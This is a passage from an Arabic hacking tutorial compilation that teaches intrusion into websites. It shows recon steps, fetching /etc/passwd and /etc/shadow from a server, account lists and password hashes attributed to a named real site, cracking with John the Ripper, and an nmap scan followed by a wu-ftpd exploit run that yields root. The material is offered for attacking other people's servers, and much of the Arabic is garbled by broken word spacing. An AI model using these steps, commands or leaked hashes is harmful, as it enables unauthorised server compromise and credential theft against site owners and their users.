‏-لربما تتساءلالآن ‏..ألاأستطیعبدلا منكل هذا الهراءأناستخدمبرنامج جاهز مثل CuteFTP؟!!‏<br />

بالطبعتستطیع ولكنلن یضركأنتعلم شیئا عنالبروتوكول الذيتستخدمه و ربما بعدتعلمالبروتوكول<br />

تستطیعأنتصنعبرنامجك الخا ص<br />

‏-اقرأالدرس مره و مرتین حتىتستوعبا لفكرةتماماثماسألفیما شئ ت<br />

- لتعلماكثر عن هذاالموضو عقم بزیارة المواقعالتالیة<br />

http://www.<strong>vb</strong>ip.<strong>com</strong>/winsock/winsock_ftp_01.asp<br />

‏(ینصحبهبشده)‏<br />

‏(ینصحبهبشده)‏<br />

لمناراد التعمقفي<br />

البروتوكول)....‏<br />

http://www.<strong>vb</strong>ip.<strong>com</strong>/winsock/winsock_ftp_ref_01.htm<br />

) http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html<br />

<strong>١</strong>٤٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$<br />

الكاتب:الكندور<br />

$$$$$$$$$$<br />

-<br />

اختراق المواقع<br />

.....<br />

‏(الجزء الثاني)‏ "<br />

ا لإختراق:‏<br />

~~~~~~~~~<br />

‏-المقدمة .<br />

‏-كی فأجمعمعلومات حول الموقع ؟<br />

‏-كی فیتمكش ف نقاط الضع ف ؟<br />

‏-كیف یمكن إ ستغلال نقاط الضع فالمكتشفه ؟<br />

‏-ماهو مل فكلمة المرور password؟ file<br />

بماذا یفیدني هذاالمل ف ؟<br />

‏-كیف یمكنمعرفةكلمة السر من خلال مل ف الباسورد password؟ file<br />

‏-ماالفر قبینإ ذاكان المل ف ‏(مشفر encryption) وإ ذاكان ‏(مضلل ‏(‏shadowed؟<br />

‏-وماذالوكان مل فكلمة المرور مشفر ‏،كی فیتمكسره ؟<br />

‏-ولوكان مل فكلمة المرور مضلل ، ماذا عليانأعمل ؟<br />

<br />

كیفیة جمعالمعلوماتقدتقدم الكلام عنها<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

-<br />

كی فیتمكش ف نقاطالضع ف ؟<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

لاتستخدمبرامج مثل voidأو eye ShadowSecurityScaner هذهللمغفلینفقط!!‏ ‏،المحترفین<br />

واللي یبغا یكون محتر ف لایستخدمبرامجفي عملیات ا لإختراق ، ولا یخترقلمجردأنه یبغا یخترق ،<br />

عملیه إختراق سیرفرتمتازبالدقهالمتناهیه ، والتخطی طالمحكم ، وكل عملیات السطوالمحكمه هي التي<br />

یصعب إكتشا ف مرتكبیها ‏،لكن وااللهلوكنت مناللي یشغلبرنامج ومایدرياالله وین حاطهفصدقنيإنك<br />

ماراحتفلح طول عمرك ، هذالوقدرتتخترق شئ ‏،فلو حد ثوتما لإختراقبواحد من هذهالبرامجفسو ف<br />

تصطادبسنارهتماماكالسمكه<br />

الآن سو فأضع النقاطالأساسیهلكش ف نقاطضع ف على موقع ما<br />

- :<br />

.....<br />

-٢<br />

‎<strong>١</strong>‎‏-التعر ف علىكافه الخدماتالموجوده علىالسیرفر.‏<br />

معرفه نظامالتشغیل وإ صدارته وكذلك ملقم الویب وأيبرمجیاتأخر ى مثل مفسر نصو صبیرلإ ذا<br />

كان ذلك ممكن ‏،أوبرنامجللبیع والشراء الخ.‏<br />

٣- عمل جلسه لإلتقاطكل السكربتات ) Cgi ( Perl - الموجودهفي الموقع ، هذاإ ذا وجد شئ منها<br />

- ٤ ولاتنسىتح ط البورتاتمعها ‏،لأنهأحیانا یكونفيالبورت نقطهضع ف ‏،لیس هذا ص حیحا<br />

نقطهالضع فلیستفيالبورت بعینه ‏،فيالبرنامج اللي مصلحإنصا تللبورت ‏(هذا أقربتعبیرلها)‏<br />

‎٥‎‏-أخیرا یمكنك ا لإ ستفاده م نالمعلوماتالتي حصلت علیهافيالب حث عن نقاط ضع ف ‏(یوجدفي آخر هذا<br />

المستند مواقع من ظمنها مواقعتحتوي علىأرشیفاتقدتفیدكفي ال حصول على الثغرات (<br />

%<strong>١</strong>٠٠<br />

<strong>١</strong>٤٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏-كیف یمكن إ ستغلال نقاط الضع فالمكتشفه ؟<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

أبس طالثغرات والتي یستطیعأي مبتديأن یستخدمهاهيتلكالتيتنفذ من خلال المتصفح ،<br />

نوع آخر ، یكون ا لإ ستثمار ‏(منالآن سو ف نطلقإسم إ ستثمار على الطریقه التيتستغلبها الثغره)‏ یكون<br />

ا لإ ستثمار على شكل شفره(كود)‏ مكتوب ببرنامج shفيلیونكس ، وهو ما یسمىبالعربيبرنامجالغلا ف<br />

وبالإنجلیزي shell وتكون هذهالشفرهتحت مل فبا لإمتداد *.sh وتعملتح تبیئهلیونكس ، وهذاالنو ع<br />

من ا لإ ستثمارات هو المفضل وی حسس المخترقبالقوه ونظرا لتعدد الأداوتفيلیونكسفإنلغه shell<br />

اصبحتقویهفهيتقابل كتابه مل ف دفعاتيفي ویندوز (bat)<br />

ویوجد نو ع منا لإ ستثماراتثاني وهو شفره ‏(كود)‏ مكتوببلغه C المشهوره ، وهذاالنو ع غالبا ماتحد ث<br />

فیهأخطأ أثناء عملیه الترجمه ‏،قدتواجهكثیر من المتاعبلذلك یجبأنتكونلدیك خلفیهفيلغه سي ،<br />

ولترجمه هذاالنو ع علیكبالذهاب الىلیونكسوترجمته بإ ستخدام المترجم gccبهذهالصیغة<br />

..<br />

gcc Exploit.c -o Exploit<br />

ملاحظه مهمه ‏(یجبأن یكون ا لإمتدادللمل ف c.* ولیس ، C‏.*لوكان حر ف cكبتلفسوفیترجم<br />

ا لإ ستثمار وكأنه كتبفي سي ++ ، الشئ الثانيتأكد منتوفرالمكتبات (h.*) التيیتطلبها ا لإ ستثمارقبل<br />

تشغیله)‏ و علیك زیاره موقعيفهناك مستنداتفيالبرمجهقدتنفعك .<br />

یوجد نوع ظهر مؤخرا من ا لإ ستثمارات وبداء ینتشر وهوأیضا شفره ولكن مكتوبهبلغه Perl ومن<br />

الممكنأنیتمتشغیل هذا النو ع من موجه الدوسفي ویندوز ‏(یجبأنتملكبرنامج یفسر شفرات البیرل<br />

مثلأكتی فبیرل (<br />

‏-ماهو مل فكلمة المرور password؟ file<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

مل فكلمة المرورمعرو ف منإسمه ‏،هوالذيفي داخلهتوجد حسابات الأشخا ص المرخ صلهمبالدخول<br />

الىالسیرفر ، مثل هذا<br />

------------------------------------------------------------------------------------------------<br />

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:<br />

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer<br />

Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp<br />

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp<br />

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network<br />

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:<br />

noaccess:x:60002:60002:No Access User:/:<br />

nobody4:x:65534:65534:SunOS 4.x Nobody:/:<br />

www:x:102:1001::/web:/bin/csh<br />

mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu<br />

sid:x:103:10::/export/home/sid:/bin/ksh<br />

mirror:x:104:1::/home/mirror:/bin/sh<br />

admin:x:105:1::/home/admin:/bin/sh<br />

jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh<br />

landmark:x:1000:1000::/web/landmark:/bin/ksh<br />

<strong>١</strong>٥٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

------------------------------------------------------------------------------------------------<br />

وقدتكونأكثر بكثیر ، حیثأن هذاالمل فالموضحبالأعلىأختصربشكلكبیر،‏ فعندسحبهكان یحتوي<br />

على آلالا ف السطور ‏،لیسكل ملفا تكلماتالمروربهذا ال حجمفیوجد منها من لایتجاوز ‎<strong>١</strong>٠‎أسطر وهي<br />

الموجوده بكثره ، علىالعمومأنت ال حین علیكتعر ف بأن مل فكلمة المرور هو الذيفي داخلهتوجد<br />

حساباتالأشخا صالمرخ صلهمبالدخول الى السیرفر ......<br />

‏-بماذا یفیدني هذا الملف ؟<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

یفیدك یاالحبیبفيمعرفهكلماتالسروإسماءالمستخدمینلكيتقوم بإختراق الموقع ، ولكنلاتفرح<br />

كلمة المرورتكون مشفره ، لا هذالیس ص حیحاتماما ‏،كانت مشفره زمان ولكنفي الوقت الحالي هي<br />

مضلله<br />

وا*‏ = xكلمة سر مضلله Shadowed<br />

= EpGw4GekZ1B9Uكلمة سر مشفره على مقیاس ، DES هذا النو ع منالتشفیرالمستخدمفي<br />

لیونكس و FreeBSD وعدد منالأنظمه الأخر ىضعی ف ، وهو دائما مكون من <strong>١</strong>٣ حر ف ورقمكبتل<br />

وسمول ولا یحتوي منبینها على رمزابداً،‏ بإ ستثناء ویندوزفهو یستخدم نوع آخر منالتشفیر وهو نوع<br />

ضعی فأیضا.‏<br />

!...<br />

‏-كیف یمكنمعرفةكلمة السر من خلال مل ف الباسورد password؟ file<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

إ ضغط Ctrlفي + Shift القسمالأیمن منلوحهالمفاتیح لتقراء منالیسارالى الیمین ‏،ثمإ ذهب الى<br />

الاعلى حیث وضعت مثاللمل فكلمة مرورتم سحبه منالموقع ... hwwilson.<strong>com</strong><br />

تفسیر هذاالسطر<br />

- :<br />

root:x:0:1:Super-User:/:/sbin/sh<br />

root<br />

x<br />

هذا السطر یوضخالمستخدم واللي هوالجذرroot<br />

هيكلمةالمرور ، ویتضحانها مضلله،‏ یعني مكانها العلامة ، x لاتفكرفيكسرهافهذا مست حیل ،<br />

لكن علیك الب حث عن مل فثانيتمتخزینفیهكلمةالمرور،‏ ستعر ف بعدقلیلكی فتفعل هذا..‏<br />

0<br />

هذا هو رقم المستخدم<br />

1<br />

رقمالمجموعه<br />

Super-User:/:/sbin/sh و هذا م ش مهم<br />

++++++++++++++++++++++++++++<br />

الجزء الثالث<br />

‏-ماالفر قبینإ ذاكان المل ف ‏(مشفر encryption) وإ ذاكان ‏(مضلل ‏(‏shadowed؟<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

المل ف المضلل shadow file یكون مكانكلمةالمرور رمز مثل ‏*أو xأو ‏#أو مثاللها ! وهذا<br />

root:x:0:1:Super-User:/:/sbin/sh لكنالمل فالمشفرتكونكلمة المرور مكتوبه ولكن<br />

مشفره مثل هذه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh<br />

<strong>١</strong>٥<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

هناتكونكلمةالمرور المشفره هي Q71KBZlvYSnVw<br />

الآن طلعتالصوره صافیه ....<br />

‏-وماذالوكان مل فكلمة المرور مشفر ‏،كی فیتمكسره ؟<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

البرامجكثیره وأشهرها هو Crack 5.0a و john the ripper ویوجد آخربإسم jack the<br />

ripper ،<br />

the ripper<br />

.....<br />

-:<br />

.<br />

--------------------------------------------------- \ Q2wrtUo9LPq2R البدایه ‏(كلمةالمرورالمشفره)‏ معأخذكلمة منال wordlist الكلمات المختاره حتى یتم<br />

word list التطاب ق->‏ Q6LiJ6ct1oUBzكلمة مرور مشفره مع الكلمة المختاره من القائمة<br />

ولنفر ض مثلا song فاذا حد ثتطابقفهذا یعنيأنكلمةالمرورالتيكانت مشفرهقدكسرت<br />

..<br />

| ------------------------------------------------------------------------------- ‏|ملاحظه مهمه -:<br />

یتم عمل دوره مثل الموضحهفيالأعلىلكسركلمات المرورالمشفرهبسرعه<br />

‎٥٠٠٠‎تجربهفيالثانیه إختبرناripper johnعلىمعالجبسرعه the<br />

(٧٠٠<br />

)<br />

‏}النهایه}‏ |<br />

| -------------------------------------------------------------------------------<br />

لتشغیل john the ripper<br />

من واجه دوس نكتبالأمرالتالي<br />

john -w:wordlist passwd<br />

حیث wordlistهو مل فالقاموس الذي یحتوي على عددكبیر منالكلمات<br />

و passwdهوالمل فالذيیحتوي علىكلماتالمرور المشفره والتي نودمعرفتها<br />

-------------------------------------------------------------------------------<br />

Microsoft(R) Windows 98<br />

C)Copyright Microsoft Corp 1981-1998.(<br />

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt<br />

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996<br />

Loaded 1 password<br />

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE<br />

>E:\Desktop\junk\john the ripper<br />

------------------------------------------------------------------------------------------------<br />

...<br />

وسو فتحفظالنتیجهفي المل ف john.pot الموجودفي نفس الدایروكتري ، وعلیك حذ ف هذا المل فإ ذا<br />

أردتالبدءفي عملیهكسر جدیده ویمكنكتغییرإسمهأو نقلهفي مكان آخربدل من حذفهإ ذاكنتتر ى ذلك<br />

هناك طریقهاخرىللكسر وهيتسمىب bruteأوبالعربيالقوهالعنیفه force ، وهي لاتحتاجلمل ف<br />

<strong>١</strong>٥٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

...<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

..<br />

، wordlistهيتقوم بتجربهكلالحرو ف والأرقام والرموز مع بع ضفي خانتان و ٣ خانات واربع<br />

وخمس الخ حتىتصیبكلمةالمرورالص حیحه ، وأناافضلانتستخدم ملفات wordlistفذلكلن یأخذ<br />

معكفيالاثوانيفقطلأن عملیهالتجربه الموضحهفيالرسمبالأعلى ذكرت بأنه سرعةتجربه الكلمات<br />

یتجاوز ‎٥٠٠٠‎كلمةفيالثانیه ‏،إ ذالمتفلح ملفات wordlist حینهاإ ذهب الى القوهالعنیفه brute<br />

.... force الأمرالتالي یجعل johnیستخدم the ripper طریقه brute force السابق ذكرها<br />

john -i passwd<br />

حیث passwdهو مل فكل مةالمرورالمرادكسره ‏،إ ذاقمت بتجربه هذه الطریقهإ ضغ ط إنتر أثناء عمل<br />

البرنامج لتر ىالىأینتوصل<br />

‏-ولوكان مل فكلمةالمرور مضلل ، ماذا عليانأعمل ؟<br />

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />

دائما سو فتواجهكلمة مرور مضلله ‏،لكنهناك طریقهتسمى Unshadowلحل هذهالمشكله<br />

إ ذا واجهت ملف مضلل علیك الب حث عن مل فثاني یسمى مل ف الشادو ‏(مل ف الظل)‏ shadow file<br />

وهذاالمل ف یوجدفيامكنهمعینه وكل نظامتشغیلله مكان یوضعبه هذا المل ف ، الیكالجدول التالي<br />

:<br />

!!<br />

Linux : /etc/shadow token = *<br />

= token SunOSیأخذأشكال : /etc/shadow متعددهاشهرها هو *<br />

x هو FreeBSDوالجدید : /etc/master.passwd or /etc/shadow token = *<br />

IRIX : /etc/shadow token = x<br />

AIX : /etc/security/passwd token = !<br />

ConvexOS : /etc/shadow or /etc/shadpw token = *<br />

token<br />

تعني الرمز الذي یوجدفيالمل ف ، passwd وهذا یفیدفيتسهیلالمهمه،‏ یعنيلو مثلالقیت<br />

علامه ‏!بدلكلمه المرورفهذایعنيانكلمة المرور مسجلهفي ، etc/security/passwd‏/لقد<br />

إ ستعنتبالجدولالسابق ذكره ، مثال على مل ف شادو أكرر مل ف شادوهو المل فالذيتخزنفیهكلمة<br />

)<br />

المرورالص حیحه (<br />

هذا مل ف shadow<br />

------------------------------------------------------------------------------------------------<br />

root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::<br />

adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::<br />

lp:NP:6445::::::<br />

------------------------------------------------------------------------------------------------<br />

نلاحظانكلمات السر موجوده<br />

الخطوه الأ خیره وهي دمج مل فالباسورد passwd file مع shadowلن passwd حصل على مل ف<br />

متكامل ونقدمهالىبرامج الكسرالسابق ذكرها...‏<br />

هذا مل فباسورد حصلنا علیه من http://wilsonweb2.hwwilson.<strong>com</strong>/etc/passwd<br />

------------------------------------------------------------------------------------------------<br />

root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:<br />

sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer<br />

Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp<br />

Admin:/usr/lib/uucp: nuucp:x:9:9:uucp<br />

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network<br />

Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:<br />

<strong>١</strong>٥٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

noaccess:x:60002:60002:No Access User:/:<br />

nobody4:x:65534:65534:SunOS 4.x Nobody:/:<br />

www:x:102:1001::/web:/bin/csh<br />

mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu<br />

sid:x:103:10::/export/home/sid:/bin/ksh<br />

mirror:x:104:1::/home/mirror:/bin/sh<br />

admin:x:105:1::/home/admin:/bin/sh<br />

jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh<br />

landmark:x:1000:1000::/web/landmark:/bin/ksh<br />

------------------------------------------------------------------------------------------------<br />

ومنال token الموضح واللي هو x نعر ف من خلالالجدولالسابق ذكره بأنكلمة المرورالص حیحهفي<br />

الدلیل /etc/shadow<br />

إذننتوجهبالمتصفح الى<br />

http://wilsonweb2.hwwilson.<strong>com</strong>/etc/shadow<br />

لن حصل على المل ف<br />

------------------------------------------------------------------------------------------------<br />

root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::<br />

bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445::::::<br />

smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445::::::<br />

listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445::::::<br />

nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507::::::<br />

mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::<br />

mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976::::::<br />

jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982::::::<br />

landmark:0jCgWu6vl8g0s:11185::::::<br />

------------------------------------------------------------------------------------------------<br />

نقومبنسخكلمات السرالموجودهفیه ولصقها مكان علامه xفي مل فالباسورد ، وهكذا مع جمیع<br />

ال حسابا تلن حصل على مل فكلمة مروركامل ومتكامل ونقدمهالىبرامج الكسر<br />

ملاحظه مهمه<br />

علیكجعلكل حسابفي سطر،‏ یعنيتربتها لتعر ف علیهابرامج الكسر<br />

-:<br />

...<br />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />

مواقعتستحق الزیاره :-<br />

أرشی فلثغرات<br />

www.securiteam.<strong>com</strong>/exploits/archive.html<br />

أرشی فلثغرات<br />

http://www.ussrback.<strong>com</strong>/<br />

أرشی فثغرات ‏+الكثیر<br />

http://www.secureroot.<strong>com</strong>/<br />

أرشی فثغرات<br />

http://rootshell.redi.tk/<br />

أرشی فثغرات<br />

<strong>١</strong>٥٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

http://www.ussrback.<strong>com</strong>/<br />

مواقعلثغرات<br />

www.secureroot.<strong>com</strong>/category/exploits<br />

دلیللمواقعالهاكینق<br />

www.hitboss.<strong>com</strong>/Hacking<br />

محركبحث لا غني عنه<br />

www.undergroundnews.<strong>com</strong>/resources/s...ound/search.asp<br />

Warez.<strong>com</strong>-Underground<br />

http://www.warez.<strong>com</strong>/<br />

Hacking<br />

‏(ممتازلمن یریدالبدایه)‏<br />

http://www.neworder.box.sk/<br />

Security Search Engine<br />

http://www.bugs2k.<strong>com</strong>/<br />

insecure<br />

http://www.insecure.org/<br />

<br />

http://public.www.easynet.co.uk/cgi...ail/formmail.pl<br />

...<br />

<strong>١</strong>٥٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

درس في اختراق المواقع<br />

‏(متوسط)‏ "<br />

...<br />

$$$$$$$$$$<br />

الكاتب:‏ ICER<br />

$$$$$$$$$$<br />

)<br />

الادواتالمطلوبه ‏:شیلاكاونت اذابحثتفي جوجل سو فتجدالكثیر منالشیلز و طبعاالناسالمحترمه<br />

احمممم)‏ بتركبلینكساو یونیكسوتعی ش حیاتها وتریح نفسها...في ناستانیه ماتحب شاللینكس<br />

الشیلاكاونتكویسلها و ممكن یمشي وانا عن نفسي م ش حاستعملالاتنین<br />

بسبالنسبهللي حیستعملوالشیل لازمیتاكدوانهبیسمحبالبرامجالاساسیه زي<br />

(:<br />

nslookup, host, dig, ping, traceroute,telnet, ssh, ftp<br />

واساسي لازمال gcc عشانتعر فتعملكومبایل...(یا عم ركبلینكس و ریح نفسك ( و طبعاالادوات<br />

واخر حاجه هيالاكسبلویت<br />

دي<br />

بع ضالملحوظات الهامه :<br />

الشیلاكاونت شبیه جدابالدوس معاختلا ففيالاوامر والوظائ ف ‏..م ش حناق شكیفیهال حصول على<br />

واحد لانفیه مواضیعكثیره اتكلمت علیه.‏<br />

‎٢‎‏-اداهال nmap هي عباره عنبورت سكانر متقدم .<br />

‎٣‎‏-ال NetCat هياداه شبیهبالتلنت وتقومبرفعبیانا تلسیرفیرمعین .<br />

‎٤‎‏-الاكسبلویتاتهي عباره عنبرامج غالباتكون مكتوبهبلغهالسي و هيتقومباعطائككافهالصلاحیات<br />

فهيتخترق جهازمعین وتقوم بعملكل شيءانتتریده ممكنتلاقیهافین؟؟؟<br />

مواقعالسیكیوریتي علىافه من یشیل...دور ولو مالقیت شقولي واناادیلككام موقعتجیب منهالحاجات<br />

دي....‏<br />

المواقع المرتبطهبالموضو ع<br />

.<br />

nmap and netcat<br />

*<br />

-<strong>١</strong><br />

:<br />

*<br />

(a) Linux (http://www.slackware.<strong>com</strong><br />

(b) Nmap (http://www.insecure.org<br />

(/c) NetCat (http://www.l0pht.<strong>com</strong>/~weld/netcat<br />

الخطوات :-<br />

<strong>١</strong>- ركبالینكس و خ ش عالنت ‏(م شقلتلك مفیشاحسن مناللینكس<br />

٢- ركبالاداه nmap متبعا التالي<br />

( P:<br />

:<br />

tar zxvf nmap.tar.gz (<strong>١</strong>*<br />

cd nmap (٢<br />

configure && make && make install/. (٣<br />

‎٣‎‏-شو ف الموقعالمستهد ف ولیكن<br />

nslookup www.target.<strong>com</strong><br />

..<br />

www.target.<strong>com</strong><br />

٤- شو فالايبيتبعالموقعباستخدام<br />

هذا سو فیعر ضلكالايبيللموقع ولیكن <strong>١</strong>٩٦٫<strong>١</strong>٫٢٫٣<br />

٥- شو ف الخدماتالليبیقدمهاالموقع وكمان شو ف نظامالتشغیل متبعا التالي :-<br />

"nmap -sS -O 196.1.2.3"<br />

<strong>١</strong>٥٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

- :<br />

root@IcEr:~# nmap -sS -O 196.1.2.3<br />

( /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap<br />

:(Interesting ports on www.target.<strong>com</strong> (196.1.2.3<br />

(The 1531 ports scanned but not shown below are in state: closed)<br />

Port State Service<br />

tcp open ftp/٢<strong>١</strong><br />

tcp open smtp/٢٥<br />

tcp open http/٨٠<br />

tcp open sunrpc/<strong>١</strong><strong>١</strong><strong>١</strong><br />

tcp open auth/<strong>١</strong><strong>١</strong>٣<br />

tcp open printer/٥<strong>١</strong>٥<br />

tcp open unknown/٩٦٣<br />

tcp open kdm/<strong>١</strong>٠٢٤<br />

tcp filtered krb524/٤٤٤٤<br />

tcp open X11/٦٠٠٠<br />

tcp filtered napster/٦٦٩٩<br />

OS guess for host: Linux 2.2.14-2.2.16<br />

(Uptime 0.160 days (since Mon Apr 30 14:51:06 2001<br />

Nmap run <strong>com</strong>pleted -- 1 IP address (1 host up) scanned in 67 seconds<br />

#~:root@IcEr<br />

المفرو ضانه یدیك مخرجات شبه الكلام ده<br />

تمامكده یا شباب نكمل...‏<br />

الكلام دهكله عباره عناستكشا فللموقع یوریك البورتاتالمفتوحه..ممكنتشو فلوكانفیه<br />

daemon شغال علىالموقع و لا في المثال الليفوق حنلاقیه موجود و دهكویس<br />

شو فايفیرجین من FTP daemon موجوده متبعاالتالي<br />

"telnet 196.1.2.3 21"<br />

او<br />

"ftp 196.1.2.3"<br />

اي منهم حیدیكبانرفیهالفیرجین بتاعهالا فتيبي دیموناللي شغاله علىالسیرفیر ممكن یكون زيكده<br />

FTP<br />

-:<br />

root@IcEr:~# ftp 196.1.2.3<br />

.Connected to 196.1.2.3<br />

www.target.<strong>com</strong> FTP server (Version wu-2.6.0(1) Mon Mar 6 ٢٢٠<br />

(13:54:16 SAST 2000<br />

.ready<br />

Name (target:root): anonymous<br />

.Guest login ok, send your <strong>com</strong>plete e-mail address as password ٣٣<strong>١</strong><br />

:Password<br />

Wel<strong>com</strong>e, archive user! This is an experimental FTP server. If have -٢٣٠<br />

any<br />

(:<br />

<strong>١</strong>٥٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

unusual problems, please report them via e-mail to -٢٣٠<br />

root@IcEr.pandora.net<br />

If you do have problems, please try using a dash (-) as the first -٢٣٠<br />

character<br />

of your password -- this will turn off the continuation messages -٢٣٠<br />

that may<br />

.be confusing your ftp client-٢٣٠<br />

-٢٣٠<br />

.Guest login ok, access restrictions apply ٢٣٠<br />

.Remote system type is UNIX<br />

.Using binary mode to transfer files<br />

ftp>by<br />

#~:root@IcEr<br />

منالكلام دهتقدرتعر فانالفیرجینالموجوده هي .wu-2.6.0<br />

وایضااحنا حاولنا نخشكمجهولین anonymous وكان تاعملیه ناجحه؛)‏<br />

صلي علىالحبیب المختار #######<br />

‎٧‎او ٨ م شفاكر المهمانهااهم خطوه<br />

احصل علىالاكسبلویت بتاعهالفیرجین دیه من .FTPd ) الليیعمل سیر ش میتوه ش (<br />

و لتكن<br />

المهملو شفتالسورسكود بتاعها حتلاقيانها متكوده عشان نظامتشغیلمعین ولیكن<br />

و یا سلاملوكانالموقعالمستهد فبیعمل على نظامالتشغیل دهكده یبقىكلالليتعملهانكتعملكومبایل<br />

للثغره دي وبشغلها على سیرفرالموقع المستهد ف وكده حیدیك<br />

red hat 6.2<br />

-:<br />

wuftpd2600.c<br />

#######<br />

root access<br />

root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3<br />

Target: 196.1.2.3 (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1)<br />

from rpm<br />

Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152<br />

..loggin into system<br />

USER ftp<br />

.Guest login ok, send your <strong>com</strong>plete e-mail address as password ٣٣<strong>١</strong><br />


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

man gcc<br />

..<br />

!Bang! You have root<br />

طبعاانا نسی تامر الكومبایل ‏..شو فالامر ده<br />

و هوه حیدیلكمعلوماتكامله عنامر الكومبایل بكلالخیارات الليمعاهكده یبقىاناكده عملت اللي<br />

علیه محد ش یسالنيباه بعدكده و یقولي یاواد یاایسراعملایه<br />

..<br />

search..U will find what U wanna<br />

...<br />

بع ضالثغرات بتحتاجه..‏<br />

اه نسی ت ‏..محد ش سالنياعملبالنتكات بعدكده طیب لو لاحظ تاننااستغلینا خاصیهال annonymous الموجوده ‏..لاكنلوكانتالخاصیهدي م ش<br />

موجوده ‏..یبقى م ش حنعر ف نكمل الكلام ده ..... عشانالاكسبلویت م شتشتغل في هذهالحاله<br />

الاكسبلویت مشتشتغلالالو معاناباسورد و یوزر نیم عشان نخ ش علىالا فتيبي بتا ع الموقع..‏<br />

صبیها..بس<br />

